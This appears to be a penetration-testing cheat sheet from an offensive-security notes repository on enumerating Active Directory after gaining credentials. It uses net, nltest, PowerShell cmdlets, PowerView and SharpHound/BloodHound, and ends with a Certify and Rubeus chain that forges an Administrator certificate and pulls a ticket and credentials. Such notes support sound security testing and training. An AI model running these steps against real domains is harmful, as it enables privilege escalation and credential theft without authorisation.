whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Cryptography/Active Directory/AD Enumeration.md

5.0 KiB
Raw Blame History

Enumerate Active Directory

Enumeration following after initial credentials are gained

SYSVOL

  • On windows use runas and gain local administrative permissions via
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
  • Check validity of credentials against SYSVOL, it stores Group Policy Objects (GPO). Every AD account will gain access
    • Query DNS, for example the DC
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip

* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth

dir \\%HOSTNAME%\SYSVOL\

* Check `SYSVOL` via `IP` address to force `NTLM` authentication

Microsoft Management Console (MMC)

  • Use AD Snap-ins of Remote Server Administrative Tools
    • Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search RSAT -> Select RSAT: Active Directory Domain Services and Lightweight Directory Tools -> Install
    • Win + r -> MMC -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click Active Directory Sites and Services -> Change Forest -> Add root domain -> right click Active Directory Users and Computers -> Change Domain -> enter root domain -> right click Active Directory Users and Computers -> View -> Advanced Features
    • Start enumerating via click on the domain object in the tree on the left
    • Take a look at People directory -> right click on them to see properties
    • Change or create user or change groups
    • Also use MMC to enumerate

CMD enumeration

Execute the following commands from any domain joined machine after inital access has been done.

Specific user

net user <username> /domain

Accounts & Groups

net user /domain
net group /domain

Specific groups like admins

net group <groupname> /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

For local admin accounts:

net localgroup administrators

Password Policy via accounts

net accounts /domain

Machines on the network:

net view

Shares on specific remote systems:

net view \$SERVER_NAME /all

Domain/Trust, which is domain controllers in the current env first and further trusted domains:

nltest /dclist:domain
nltest /domain_trust

Powershell Cmdlets

User details via:

Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *

Groups:

Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *

Group membership:

Get-ADGroupMember -Identity Administrators -Server exampleDC.com

Admin group members:

Get-ADGroupMember "Domain Admins"

Generic AD objects:

Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com

Domains:

 Get-ADDomain -Server exampleDC.com

All Computer accounts which joined the domain:

Get-ADComputer -Filter *

Sharphound and Bloodhound

  • BloodHound documentation

  • Change to AD user via runas.exe and collect via one of the following

    • Sharphound.ps1
    • sharphound.exe
    • Azurehound.ps1

  • For example

Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
  • After some time collect the current sessions via
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
  • Start neo4j db
neo4j console start
  • Start bloodhound
bloodhound --no-sandbox
  • Drag and Drop the zip file from Sharphound
  • Either search for AD objects and use Analysis to find an attack path through the info on the edges
  • Shows exploitable accounts in the Analysis tab, for example kerberroastable accounts

LDAP

PowerView

Registered Machines in the domain

Get-NetComputer | select "name"

When the computers were added to the domain

Get-ADComputer -filter * -properties whencreated | Select Name,@{n="Owner";e={(Get-acl "ad:\$($_.distinguishedname)").owner}},whencreated

WMI

Find Certifications and Private Keys

Certification Services can be found with the Certify tool.

  • Enumerate vunerabilities on the current user via Certify, use FullName found in the first step to insert domain in the second step
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
  • Copy the found key and convert it like mentioned in the last line of the ouptut, for example
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
  • Get ticket with the the loot via Rubeus
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials